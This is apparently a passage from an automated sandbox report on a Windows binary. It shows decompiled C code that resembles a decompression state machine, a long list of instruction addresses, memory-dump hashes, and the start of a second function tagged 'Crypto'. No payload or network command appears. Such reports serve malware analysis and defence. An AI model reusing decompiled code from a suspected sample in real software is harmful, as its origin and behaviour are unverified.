														continue;
													} else {
														goto L285;
													}
													goto L331;
												}
												goto L312;
											}
										}
										goto L331;
									case 0x19:
										L296:
										if( *((intOrPtr*)(__edi + 8)) == 0 ||  *(__edi + 0x10) == 0) {
											L309:
											 *__edi = 0x1a;
											goto L310;
										} else {
											if(__esi >= 0x20) {
												L301:
												if(__ebx ==  *((intOrPtr*)(__edi + 0x1c))) {
													__ebx = 0;
													__esi = 0;
													goto L309;
												} else {
													L302:
													( *(_t730 + 0x40))[6] = 0x41d338;
													L303:
													 *_t714 = 0x1b;
													goto L304;
												}
											} else {
												while(__edx != 0) {
													__eax =  *__ebp & 0x000000ff;
													__ecx = __esi;
													__eax = ( *__ebp & 0x000000ff) << __cl;
													__edx = __edx - 1;
													__esi = __esi + 8;
													__ebp =  &(__ebp[1]);
													__ebx = __ebx + __eax;
													 *(__esp + 0x10) = __edx;
													if(__esi < 0x20) {
														continue;
													} else {
														goto L301;
													}
													goto L331;
												}
												goto L312;
											}
										}
										goto L331;
									case 0x1a:
										L310:
										 *(__esp + 0x30) = 1;
										goto L312;
									case 0x1b:
										 *(__esp + 0x30) = 0xfffffffd;
										L312:
										_t651 =  *(_t730 + 0x40);
										_t651[3] =  *(_t730 + 0x24);
										_t651[4] =  *(_t730 + 0x18);
										 *_t651 = _t723;
										_t651[1] = _t705;
										_t714[0xe] = _t667;
										_t714[0xf] = _t716;
										if(_t714[0xa] != 0 ||  *_t714 < 0x18 &&  *(_t730 + 0x28) != _t651[4]) {
											if(E004072B0( *(_t730 + 0x28),  *(_t730 + 0x40)) == 0) {
												goto L318;
											} else {
												 *_t714 = 0x1c;
												goto L317;
											}
										} else {
											L318:
											_t718 =  *(_t730 + 0x40);
											_t726 =  *(_t730 + 0x38) - _t718[1];
											_t675 =  *(_t730 + 0x28) - _t718[4];
											_t718[2] =  &(_t718[2][_t726]);
											_t718[5] =  &(_t718[5][_t675]);
											_t714[7] = _t714[7] + _t675;
											if(_t714[2] != 0 && _t675 != 0) {
												_push(_t675);
												if(_t714[4] == 0) {
													_push(_t718[3] - _t675);
													_push(_t714[6]);
													_t662 = E004024A0();
												} else {
													_push(_t718[3] - _t675);
													_push(_t714[6]);
													_t662 = E00403080();
												}
												_t714[6] = _t662;
												_t730 = _t730 + 0xc;
												_t718[0xc] = _t662;
											}
											asm("sbb edx, edx");
											_t718[0xb] = ( ~(_t714[1]) & 0x00000040) + ((0 |  *_t714 != 0x0000000b) - 0x00000001 & 0x00000080) + _t714[0xf];
											if(_t726 != 0 || _t675 != 0) {
												if( *((intOrPtr*)(_t730 + 0x44)) != 4) {
													return  *(_t730 + 0x30);
												} else {
													goto L327;
												}
											} else {
												L327:
												_t641 =  *(_t730 + 0x30);
												if(_t641 != 0) {
													L306:
													return _t641;
												} else {
													return 0xfffffffb;
												}
											}
										}
										goto L331;
									case 0x1c:
										L317:
										return 0xfffffffc;
										goto L331;
								}
								L304:
								_t640 =  *_t714;
							} while (_t640 <= 0x1c);
							goto L305;
						}
					}
				}
				L331:
			}

0x004073a0
0x004073aa
0x004087b7
0x004087c0
0x004073b0
0x004073b0
0x004073b5
0x00000000
0x004073d4
0x004073d7
0x004073d9
0x004073d9
0x004073e2
0x004073e6
0x004073ea
0x004073ec
0x004073f0
0x004073f3
0x004073f6
0x004073f9
0x004073fd
0x00407401
0x00407405
0x00407409
0x00407414
0x00408666
0x00408666
0x00000000
0x00407420
0x00407420
0x00407420
0x00000000
0x0040742b
0x0040743b
0x00407460
0x00407464
0x004074af
0x004074b2
0x004074bb
0x004074bd
0x004074bd
0x004074c8
0x00407562
0x00000000
0x004074e8
0x004074f0
0x00407506
0x0040750e
0x00407511
0x00407517
0x00407529
0x0040752b
0x0040752d
0x0040752f
0x00407532
0x0040753b
0x0040754a
0x0040754d
0x00407550
0x00407552
0x00407555
0x00407557
0x00407519
0x00407519
0x00000000
0x00407519
0x004074f2
0x004074f6
0x004074fa
0x00000000
0x004074fa
0x004074f0
0x0040746e
0x00407479
0x00407482
0x00407487
0x00407491
0x00407496
0x0040749a
0x0040749d
0x0040749f
0x004074a2
0x004074a4
0x004074a4
0x00000000
0x00407440
0x00407440
0x0040744e
0x00407450
0x00407451
0x00407454
0x00407455
0x00407457
0x0040745e
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040745e
0x00000000
0x00407440
0x0040742d
0x0040742d
0x00000000
0x0040742d
0x00000000
0x00000000
0x00407575
0x00407597
0x00407597
0x0040759d
0x00000000
0x004075a3
0x004075a9
0x004075bb
0x004075c0
0x004075c4
0x004075c7
0x004075ca
0x004075ca
0x004075d3
0x004075d5
0x004075d9
0x004075de
0x004075e2
0x004075e6
0x004075eb
0x004075f0
0x004075f7
0x004075f7
0x004075fa
0x004075fc
0x004075fe
0x00000000
0x00000000
0x00000000
0x00000000
0x004075a9
0x00407577
0x00407577
0x0040757f
0x00407583
0x00407585
0x00407587
0x00407588
0x0040758b
0x0040758c
0x0040758e
0x00407595
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00407595
0x00000000
0x00407577
0x00000000
0x00000000
0x00407609
0x00407630
0x00407630
0x00407635
0x00407637
0x00407637
0x00407641
0x00407643
0x00407647
0x00407649
0x0040764b
0x0040764e
0x00407651
0x00407656
0x0040765a
0x0040765e
0x00407662
0x00407666
0x0040766b
0x00407670
0x00407677
0x00407677
0x0040767a
0x0040767c
0x0040767e
0x00000000
0x0040760b
0x00000000
0x00407610
0x00407618
0x0040761c
0x0040761e
0x00407620
0x00407621
0x00407624
0x00407625
0x00407627
0x0040762e
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040762e
0x00000000
0x00407610
0x00000000
0x00000000
0x00407689
0x004076b0
0x004076b0
0x004076b5
0x004076b9
0x004076bf
0x004076c2
0x004076c5
0x004076c7
0x004076ca
0x004076ca
0x004076d4
0x004076d6
0x004076da
0x004076df
0x004076e3
0x004076e7
0x004076ec
0x004076f1
0x004076f8
0x004076f8
0x004076fb
0x004076fd
0x004076ff
0x00000000
0x0040768b
0x00000000
0x00407690
0x00407698
0x0040769c
0x0040769e
0x004076a0
0x004076a1
0x004076a4
0x004076a5
0x004076a7
0x004076ae
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004076ae
0x00000000
0x00407690
0x00000000
0x00000000
0x00407705
0x0040770c
0x00407774
0x00407779
0x0040777b
0x0040777b
0x00000000
0x0040770e
0x00407711
0x00407733
0x00407733
0x00407736
0x0040773b
0x0040773d
0x0040773d
0x00407747
0x00407749
0x0040774d
0x00407752
0x00407756
0x0040775a
0x0040775f
0x00407764
0x0040776b
0x0040776b
0x0040776e
0x00407770
0x00407782
0x00407782
0x00000000
0x00407713
0x00407713
0x0040771b
0x0040771f
0x00407721
0x00407723
0x00407724
0x00407727
0x00407728
0x0040772a
0x00407731
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00407731
0x00000000
0x00407713
0x00407711
0x00000000
0x00000000
0x00407788
0x0040778f
0x00407833
0x00407833
0x0040783a
0x00000000
0x00407795
0x00407795
0x00407798
0x0040779e
0x004077a0
0x004077a2
0x004077a2
0x004077a8
0x004077aa
0x004077af
0x004077b1
0x004077b4
0x004077ba
0x004077bf
0x004077c2
0x004077c5
0x004077c8
0x004077cb
0x004077d3
0x004077d9
0x004077d9
0x004077db
0x004077e0
0x004077e4
0x004077e8
0x004077ed
0x004077f1
0x004077f5
0x004077ba
0x004077ff
0x00407801
0x00407805
0x0040780b
0x00407810
0x00407814
0x00407817
0x0040781b
0x0040781e
0x00407820
0x00407822
0x00407825
0x00407825
0x0040782d
0x00000000
0x00000000
0x00000000
0x00000000
0x0040782d
0x00000000
0x00000000
0x00407840
0x00407847
0x004078da
0x004078df
0x004078e1
0x004078e1
0x00000000
0x0040784d
0x0040784f
0x00000000
0x00407855
0x00407855
0x00407857
0x00407857
0x0040785c
0x00407860
0x00407863
0x00407869
0x0040786b
0x0040786e
0x00407874
0x00407876
0x0040787c
0x0040787e
0x00407882
0x00407886
0x00407889
0x0040788c
0x0040788c
0x0040787c
0x00407874
0x00407895
0x00000000
0x00000000
0x00407897
0x0040789d
0x00000000
0x00000000
0x00000000
0x0040789d
0x004078a6
0x004078a8
0x004078ac
0x004078b2
0x004078b7
0x004078be
0x004078be
0x004078c1
0x004078c5
0x004078c7
0x004078ce
0x004078d2
0x00000000
0x004078d8
0x004078e8
0x004078e8
0x004078ef
0x00000000
0x004078ef
0x004078d2
0x0040784f
0x00000000
0x00000000
0x004078f5
0x004078fc
0x00407993
0x00407998
0x0040799a
0x0040799a
0x00000000
0x00407902
0x00407904
0x00000000
0x0040790a
0x0040790a
0x00407910
0x00407910
0x00407915
0x00407919
0x0040791c
0x00407922
0x00407924
0x00407927
0x0040792d
0x0040792f
0x00407935
0x00407937
0x0040793b
0x0040793f
0x00407942
0x00407945
0x00407945
0x00407935
0x0040792d
0x0040794e
0x00000000
0x00000000
0x00407950
0x00407956
0x00000000
0x00000000
0x00000000
0x00407956
0x0040795f
0x00407961
0x00407965
0x0040796b
0x00407970
0x00407977
0x00407977
0x0040797a
0x0040797e
0x00407980
0x00407987
0x0040798b
0x00000000
0x00407991
0x004079a1
0x004079a1
0x00000000
0x004079a1
0x0040798b
0x00407904
0x00000000
0x00000000
0x004079a7
0x004079ae
0x004079f1
0x004079f1
0x004079f6
0x004079fb
0x004079fe
0x00407a01
0x00407a04
0x00407a07
0x00407a07
0x00407a14
0x00407a19
0x00407a1d
0x00407a21
0x00407a24
0x00407a2a
0x00000000
0x004079b0
0x004079b3
0x004079d5
0x004079d5
0x004079db
0x004079ed
0x004079ef
0x00000000
0x004079dd
0x004079dd
0x004079e1
0x00000000
0x004079e1
0x00000000
0x004079b5
0x004079b5
0x004079bd
0x004079c1
0x004079c3
0x004079c5
0x004079c6
0x004079c9
0x004079ca
0x004079cc
0x004079d3
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004079d3
0x00000000
0x004079b5
0x004079b3
0x00000000
0x00000000
0x00407a38
0x00407a60
0x00407a62
0x00407a6a
0x00407a6d
0x00407a71
0x00407a74
0x00407a77
0x00407a7c
0x00407a81
0x00407a84
0x00407a88
0x00407a8b
0x00407a8e
0x00407a90
0x00407a92
0x00000000
0x00407a40
0x00407a40
0x00407a48
0x00407a4c
0x00407a4e
0x00407a50
0x00407a51
0x00407a54
0x00407a55
0x00407a57
0x00407a5e
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00407a5e
0x00000000
0x00407a40
0x00000000
0x00000000
0x00407a98
0x00407a9c
0x00408673
0x00408677
0x0040867b
0x0040867e
0x00408682
0x00408684
0x00408687
0x0040868a
0x0040868d
0x0040868e
0x0040868f
0x00408692
0x00408693
0x0040869c
0x00407aa2
0x00407aa2
0x00407aa4
0x00407aa6
0x00407aa8
0x00407aad
0x00407ab1
0x00407ab4
0x00407ab7
0x00407abb
0x00407abe
0x00000000
0x00407abe
0x00000000
0x00000000
0x00407ac4
0x00407ac9
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00407acf
0x00407ad3
0x00407aec
0x00407b10
0x00407b10
0x00407b12
0x00407b14
0x00407b16
0x00407b19
0x00407b1c
0x00407b1d
0x00407b23
0x00407b77
0x00407b77
0x00407b7a
0x00407b25
0x00407b25
0x00000000
0x00407b2c
0x00407b2f
0x00407b35
0x00000000
0x00000000
0x00407b3d
0x00407b3f
0x00407b44
0x00407b47
0x00407b4d
0x00000000
0x00000000
0x00407b55
0x00407b58
0x00407b5e
0x00000000
0x00000000
0x00407b66
0x00407b6a
0x00407b71
0x00000000
0x00000000
0x00407b25
0x00000000
0x00407af0
0x00407af0
0x00407af8
0x00407afc
0x00407afe
0x00407b00
0x00407b01
0x00407b04
0x00407b05
0x00407b07
0x00407b0e
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00407b0e
0x00000000
0x00407af0
0x00407ad5
0x00407ad7
0x00407ada
0x00407adc
0x00407ade
0x00000000
0x00407ade
0x00000000
0x00000000
0x00407b84
0x00407b87
0x00407b89
0x00407b8e
0x00407bb0
0x00407bb0
0x00407bb2
0x00407bb4
0x00407bb6
0x00407bbb
0x00407bc0
0x00407bd2
0x00407bd4
0x00407bd7
0x00407bd9
0x00000000
0x00407bc2
0x00407bc2
0x00407bc6
0x00000000
0x00407bc6
0x00407b90
0x00407b90
0x00407b98
0x00407b9c
0x00407b9e
0x00407ba0
0x00407ba1
0x00407ba4
0x00407ba5
0x00407ba7
0x00407bae
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00407bae
0x00000000
0x00407b90
0x00000000
0x00000000
0x00407bdf
0x00407bdf
0x00407be2
0x00407be8
0x00000000
0x00407bee
0x00407bf0
0x00407bf2
0x00407bf4
0x00407bf4
0x00407bf8
0x00407bfe
0x00407c00
0x00407c02
0x00407c02
0x00407c08
0x00000000
0x00407c0e
0x00407c0e
0x00407c12
0x00407c19
0x00407c1e
0x00407c22
0x00407c26
0x00407c2a
0x00407c2e
0x00407c35
0x00407c37
0x00000000
0x00407c37
0x00407c08
0x00000000
0x00000000
0x00407c42
0x00407c64
0x00407c64
0x00407c66
0x00407c69
0x00407c6c
0x00407c72
0x00407c74
0x00407c77
0x00407c7a
0x00407c7c
0x00407c7f
0x00407c82
0x00407c83
0x00407c86
0x00407c89
0x00407c93
0x00407c96
0x00407c99
0x00000000
0x00407ca8
0x00407ca8
0x00407caf
0x00000000
0x00407caf
0x00407c44
0x00407c44
0x00407c4c
0x00407c50
0x00407c52
0x00407c54
0x00407c55
0x00407c58
0x00407c59
0x00407c5b
0x00407c62
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00407c62
0x00000000
0x00407c44
0x00000000
0x00000000
0x00407cb5
0x00407cb5
0x00407cbb
0x00407d0b
0x00407d0b
0x00407d13
0x00407d20
0x00407d23
0x00407d2b
0x00407d2d
0x00407d32
0x00407d35
0x00407d3a
0x00407d40
0x00407d43
0x00407d45
0x00407d48
0x00407d4f
0x00407d54
0x00407d5c
0x00407d62
0x00407d67
0x00407d6e
0x00407d74
0x00000000
0x00407d7a
0x00407d7a
0x00407d7d
0x00000000
0x00407d7d
0x00407cc0
0x00407cc0
0x00407cc3
0x00000000
0x00407cc5
0x00407cc5
0x00407ccd
0x00407cd1
0x00407cd3
0x00407cd5
0x00407cd6
0x00407cd9
0x00407cda
0x00407cdc
0x00407ce3
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00407ce3
0x00000000
0x00407cc5
0x00000000
0x00407ce5
0x00407ce5
0x00407ce8
0x00407cf2
0x00407cf5
0x00407cfa
0x00407cfd
0x00407d00
0x00407d03
0x00407d06
0x00000000
0x00407cc0
0x00000000
0x00000000
0x00407d83
0x00407d83
0x00407d86
0x00407d8c
0x00407fb5
0x00407fb8
0x00000000
0x00407fbe
0x00407fbe
0x00407fc4
0x00407fc7
0x00407fc9
0x00407fd0
0x00407fd3
0x00407fd8
0x00407fdc
0x00407fe2
0x00407fe8
0x00407ff0
0x00407ff6
0x0040800c
0x0040800f
0x00408012
0x00408015
0x0040801c
0x00408021
0x00408024
0x0040802a
0x0040802e
0x00408035
0x0040803a
0x00408041
0x00408047
0x00408059
0x00000000
0x00408049
0x00408049
0x0040804d
0x00000000
0x0040804d
0x00407ff8
0x00407ff8
0x00407ffc
0x00408000
0x00000000
0x00408000
0x00407ff6
0x00407d92
0x00407d92
0x00407d92
0x00407d9a
0x00407d9c
0x00407da0
0x00407da2
0x00407da7
0x00407daa
0x00407dad
0x00407db3
0x00407df3
0x00407df5
0x00407dfb
0x00407e52
0x00407e5b
0x00407ec9
0x00407ecc
0x00407ed0
0x00407f1e
0x00407f23
0x00407f4b
0x00407f4b
0x00407f4f
0x00407f52
0x00407f55
0x00407f59
0x00407f5c
0x00000000
0x00407f25
0x00407f25
0x00407f2d
0x00407f31
0x00407f33
0x00407f35
0x00407f39
0x00407f3a
0x00407f3d
0x00407f3f
0x00407f42
0x00407f43
0x00407f49
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00407f49
0x00000000
0x00407f25
0x00407ed2
0x00407ed2
0x00407ed7
0x00407f06
0x00407f06
0x00407f0a
0x00407f0d
0x00407f10
0x00407f14
0x00407f17
0x00407f61
0x00407f63
0x00407f65
0x00407f69
0x00000000
0x00407ee0
0x00407ee0
0x00407ee8
0x00407eec
0x00407eee
0x00407ef0
0x00407ef4
0x00407ef5
0x00407ef8
0x00407efa
0x00407efd
0x00407efe
0x00407f04
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00407f04
0x00000000
0x00407ee0
0x00407ed7
0x00407e5d
0x00407e5d
0x00407e60
0x00407e63
0x00407e69
0x00407e96
0x00407e96
0x00407e99
0x00407e9b
0x00407e9f
0x00000000
0x00407ea5
0x00407ea5
0x00407eac
0x00407eaf
0x00407eb2
0x00407eb5
0x00407eb9
0x00407ebd
0x00407f71
0x00407f71
0x00407f74
0x00407f79
0x00407f7e
0x004075ab
0x004075ab
0x004075af
0x00000000
0x00407f84
0x00407f89
0x00407f8b
0x00407f90
0x00407f90
0x00407f93
0x00407f97
0x00407f9c
0x00407f9f
0x00407f90
0x00000000
0x00407f89
0x00407f7e
0x00407e6b
0x00407e70
0x00407e78
0x00407e7c
0x00407e7e
0x00407e80
0x00407e84
0x00407e85
0x00407e88
0x00407e8a
0x00407e8d
0x00407e8e
0x00407e94
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00407e94
0x00000000
0x00407e70
0x00407e69
0x00407dfd
0x00407dff
0x00407e02
0x00407e07
0x00407e36
0x00407e36
0x00407e39
0x00407e3c
0x00407e3e
0x00407e40
0x00407e45
0x00407e4a
0x00000000
0x00407e10
0x00407e10
0x00407e18
0x00407e1c
0x00407e1e
0x00407e20
0x00407e21
0x00407e24
0x00407e25
0x00407e27
0x00407e2b
0x00407e2e
0x00407e34
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00407e34
0x00000000
0x00407e10
0x00407e07
0x00407db5
0x00407db5
0x00407dbd
0x00407dc1
0x00407dc3
0x00407dc5
0x00407dc8
0x00407dc9
0x00407dcc
0x00407dd3
0x00407dd5
0x00407dd8
0x00407dd9
0x00407dde
0x00407de0
0x00407de5
0x00407de8
0x00407deb
0x00407df1
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00407df1
0x00000000
0x00407db5
0x00000000
0x00407fa6
0x00407fa6
0x00407fa9
0x00407fac
0x00000000
0x00407d92
0x00000000
0x00000000
0x0040805f
0x00408062
0x004080c5
0x004080cd
0x004080d0
0x004080d2
0x004080d4
0x004080d7
0x004080dc
0x004080df
0x004080e2
0x004080e8
0x0040812e
0x00408130
0x004081f7
0x004081f9
0x004081fc
0x004081ff
0x00408201
0x00408203
0x00408209
0x0040820c
0x00408211
0x00408220
0x0040822f
0x00408244
0x00408247
0x0040824a
0x00000000
0x00408231
0x00408231
0x00408235
0x00000000
0x00408235
0x00408222
0x00408222
0x00408222
0x00000000
0x00408222
0x00408213
0x00408213
0x00000000
0x00408213
0x0040813e
0x00408140
0x00408143
0x00408147
0x0040814a
0x00408151
0x00408155
0x0040815e
0x00408160
0x00408165
0x00408167
0x0040816d
0x00408170
0x00408172
0x00408174
0x00408177
0x0040817a
0x0040817f
0x00408186
0x00408189
0x0040818d
0x004081ea
0x004081ea
0x004081ef
0x004081f3
0x004081f5
0x00000000
0x00408190
0x00408190
0x00408198
0x0040819c
0x0040819e
0x004081a0
0x004081a4
0x004081a5
0x004081a8
0x004081aa
0x004081ad
0x004081b4
0x004081bb
0x004081bd
0x004081c1
0x004081c2
0x004081c7
0x004081c9
0x004081cb
0x004081d0
0x004081d2
0x004081d5
0x004081d8
0x004081df
0x004081e2
0x004081e8
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004081e8
0x00000000
0x00408190
0x0040818d
0x004080f0
0x004080f0
0x004080f8
0x004080fc
0x004080fe
0x00408100
0x00408103
0x00408104
0x00408107
0x0040810e
0x00408110
0x00408113
0x00408114
0x00408119
0x0040811b
0x00408120
0x00408123
0x00408126
0x0040812c
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040812c
0x00000000
0x004080f0
0x0040806e
0x0040806e
0x00408072
0x00408076
0x0040807a
0x0040807d
0x00408081
0x00408084
0x00408088
0x00408089
0x0040808b
0x0040808e
0x0040808f
0x00408092
0x00408095
0x0040809a
0x0040809e
0x004080a1
0x004080a4
0x004080a6
0x004080a9
0x004080ac
0x004080af
0x004080b3
0x004080b6
0x004080ba
0x004080be
0x00000000
0x004080be
0x00000000
0x00000000
0x00408250
0x00408250
0x00408255
0x00408294
0x00408294
0x00000000
0x00408257
0x00408259
0x00408280
0x00408280
0x00408288
0x0040828b
0x0040828d
0x00408290
0x00408292
0x00000000
0x0040825b
0x00408260
0x00408268
0x0040826c
0x0040826e
0x00408270
0x00408271
0x00408274
0x00408275
0x00408277
0x0040827e
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040827e
0x00000000
0x00408260
0x00408259
0x00000000
0x00000000
0x0040829a
0x0040829a
0x004082a2
0x004082a5
0x004082a7
0x004082a9
0x004082ac
0x004082b1
0x004082b4
0x004082b7
0x004082bd
0x004082fe
0x00408300
0x004083be
0x004083c0
0x004083c3
0x004083c6
0x004083c8
0x004083ca
0x004083d0
0x004083e2
0x004083e4
0x004083e7
0x004083ea
0x004083ed
0x004083f0
0x004083f3
0x00000000
0x004083d2
0x004083d2
0x004083d6
0x00000000
0x004083d6
0x00408306
0x00408308
0x0040830b
0x0040830f
0x00408312
0x00408319
0x0040831d
0x00408326
0x00408328
0x0040832d
0x0040832f
0x00408335
0x00408338
0x0040833a
0x0040833c
0x0040833f
0x00408342
0x00408347
0x0040834e
0x00408351
0x00408355
0x004083b1
0x004083b1
0x004083b6
0x004083ba
0x004083bc
0x00000000
0x00408357
0x00408357
0x0040835f
0x00408363
0x00408365
0x00408367
0x0040836b
0x0040836c
0x0040836f
0x00408371
0x00408374
0x0040837b
0x00408382
0x00408384
0x00408388
0x00408389
0x0040838e
0x00408390
0x00408392
0x00408397
0x00408399
0x0040839c
0x0040839f
0x004083a6
0x004083a9
0x004083af
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004083af
0x00000000
0x00408357
0x00408355
0x004082c0
0x004082c0
0x004082c8
0x004082cc
0x004082ce
0x004082d0
0x004082d3
0x004082d4
0x004082d7
0x004082de
0x004082e0
0x004082e3
0x004082e4
0x004082e9
0x004082eb
0x004082f0
0x004082f3
0x004082f6
0x004082fc
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004082fc
0x00000000
0x004082c0
0x00000000
0x00000000
0x004083f9
0x004083f9
0x004083fe
0x00408438
0x0040843b
0x0040843f
0x00408446
0x00408458
0x00000000
0x00408448
0x00408448
0x0040844c
0x00000000
0x0040844c
0x00408400
0x00408402
0x00408424
0x00408424
0x0040842c
0x0040842e
0x0040842f
0x00408431
0x00408434
0x00408436
0x00000000
0x00408404
0x00408404
0x0040840c
0x00408410
0x00408412
0x00408414
0x00408415
0x00408418
0x00408419
0x0040841b
0x00408422
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00408422
0x00000000
0x00408404
0x00408402
0x00000000
0x00000000
0x0040845e
0x00408463
0x00000000
0x00408469
0x00408469
0x0040846d
0x00408471
0x00408476
0x004084b4
0x004084b8
0x004084ba
0x004084bd
0x004084c1
0x00000000
0x00408478
0x00408478
0x0040847a
0x0040847d
0x00408483
0x00408498
0x0040849a
0x0040849d
0x00408485
0x00408485
0x0040848a
0x0040848d
0x00408491
0x00408491
0x004084a1
0x004084a5
0x004084a8
0x004084ae
0x004084b0
0x004084c5
0x004084c5
0x004084c5
0x004084ae
0x004084c9
0x004084cf
0x004084d1
0x004084d3
0x004084d3
0x004084d9
0x004084dd
0x004084e1
0x004084e3
0x004084e7
0x004084f0
0x004084f0
0x004084f4
0x004084f6
0x004084fa
0x004084fc
0x004084fd
0x004084fd
0x004084fd
0x00408508
0x0040850c
0x00408512
0x00408512
0x00000000
0x0040850c
0x00000000
0x00000000
0x00408522
0x00000000
0x00408528
0x00408528
0x0040852c
0x0040852f
0x00408531
0x00408532
0x00408536
0x0040853a
0x00000000
0x0040853a
0x00000000
0x00000000
0x00408549
0x00408606
0x00408606
0x00000000
0x0040854f
0x00408552
0x00408574
0x00408574
0x00408578
0x0040857c
0x00408580
0x00408583
0x00408586
0x0040858c
0x0040858e
0x00408592
0x00408595
0x0040859c
0x0040859d
0x0040859e
0x004085a7
0x004085a0
0x004085a0
0x004085a0
0x004085ac
0x004085b0
0x004085b4
0x004085b7
0x004085ba
0x004085ba
0x004085c1
0x004085c5
0x004085c9
0x004085cb
0x004085cd
0x004085d4
0x004085d7
0x004085db
0x004085de
0x004085e4
0x004085e7
0x004085eb
0x004085ee
0x004085ee
0x004085f3
0x00408602
0x00408604
0x00000000
0x004085f5
0x004085f5
0x004085f9
0x00000000
0x004085f9
0x00408554
0x00408554
0x0040855c
0x00408560
0x00408562
0x00408564
0x00408565
0x00408568
0x00408569
0x0040856b
0x00408572
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00408572
0x00000000
0x00408554
0x00408552
0x00000000
0x00000000
0x0040860c
0x00408610
0x004086a1
0x004086a1
0x00000000
0x00408620
0x00408623
0x00408645
0x00408648
0x0040869d
0x0040869f
0x00000000
0x0040864a
0x0040864a
0x0040864e
0x00408655
0x00408655
0x00000000
0x00408655
0x00408625
0x00408625
0x0040862d
0x00408631
0x00408633
0x00408635
0x00408636
0x00408639
0x0040863a
0x0040863c
0x00408643
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00408643
0x00000000
0x00408625
0x00408623
0x00000000
0x00000000
0x004086a7
0x004086a7
0x00000000
0x00000000
0x004086b1
0x004086b9
0x004086b9
0x004086c1
0x004086c8
0x004086cb
0x004086cd
0x004086d4
0x004086d7
0x004086da
0x004086f9
0x00000000
0x004086fb
0x004086fb
0x00000000
0x004086fb
0x0040870e
0x0040870e
0x0040870e
0x00408716
0x0040871d
0x00408720
0x00408723
0x00408726
0x0040872d
0x00408737
0x00408738
0x00408753
0x00408754
0x00408755
0x0040873a
0x00408742
0x00408743
0x00408744
0x00408744
0x0040875a
0x0040875d
0x00408760
0x00408760
0x00408768
0x00408780
0x00408785
0x00408790
0x004087b6
0x00000000
0x00000000
0x00000000
0x00408792
0x00408792
0x00408792
0x00408798
0x0040866b
0x00408672
0x0040879e
0x004087aa
0x004087aa
0x00408798
0x00408785
0x00000000
0x00000000
0x00408701
0x0040870d
0x00000000
0x00000000
0x0040865b
0x0040865b
0x0040865d
0x00000000
0x00407420
0x00407414
0x004073b5
0x00000000

Memory Dump Source

Source File: 00000001.00000002.269403070.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.269395499.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.269422618.000000000041B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.269432922.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.269440776.0000000000426000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.269448892.0000000000439000.00000004.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 20055dc05f39624d89f9d13173d00032c9ddb5f23ed3028259e70998ae7a08b4
Instruction ID: 17d22deff8d32e931318445bbea846c6b698fa6fcc44f6923348d96d7e24b863
Opcode Fuzzy Hash: 20055dc05f39624d89f9d13173d00032c9ddb5f23ed3028259e70998ae7a08b4
Instruction Fuzzy Hash: 0A329E70A087029FD318CF29C98472AB7E1BF84304F148A3EE89567781D779E955CBDA

Uniqueness

Uniqueness Score: -1.00%

Function 024FF2E0, Relevance: .5, Instructions: 504COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.270270330.00000000024F0000.00000040.00000001.sdmp, Offset: 024F0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a31a945feab5771635d85a165e7c56437ec1281976c7b8d886179764ad8cc82e
Instruction ID: d36953d6755f5e8db88220e96766c3e0d7bd7621c164dab96ba50106777c29f6
Opcode Fuzzy Hash: a31a945feab5771635d85a165e7c56437ec1281976c7b8d886179764ad8cc82e
Instruction Fuzzy Hash: D112D231A002499FCB55DF64D484A9EBBF2FF84314F16846AE615DB7A1DB30EC4ACB90

Uniqueness

Uniqueness Score: -1.00%

Function 00406CA0, Relevance: .4, Instructions: 401
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00406CA0() {
				intOrPtr _t153;
				unsigned int _t157;
				unsigned int _t160;
				intOrPtr _t172;
				signed int _t174;
				signed char _t180;
				signed int _t181;
				void* _t183;
				void* _t185;
				void* _t186;
				void* _t187;
				void* _t188;
				intOrPtr _t190;
				unsigned int _t192;
				char _t198;
				char _t199;
				char _t202;
				unsigned int _t217;
				intOrPtr* _t221;
				intOrPtr _t222;
				signed char _t230;
				intOrPtr* _t232;
				signed char _t237;
				unsigned int _t245;
				intOrPtr _t248;
				intOrPtr _t249;
				void* _t250;
				void* _t251;
				void* _t252;
				signed char _t263;
				signed char _t269;
				signed int _t280;
				signed int _t284;
				intOrPtr _t285;
				signed char _t288;
				signed char _t290;
				unsigned int _t297;
				char _t308;
				signed int _t309;
				signed int _t310;
				signed int _t311;
				signed int _t318;
				signed int _t326;
				signed int _t327;
				signed int _t328;
				signed int _t329;
				char* _t331;
				char* _t333;
				char* _t334;
				char* _t335;
				signed char* _t337;
				void* _t341;
				unsigned int _t342;
				void* _t345;
				void* _t346;
				intOrPtr _t347;
				signed char* _t348;
				void* _t349;

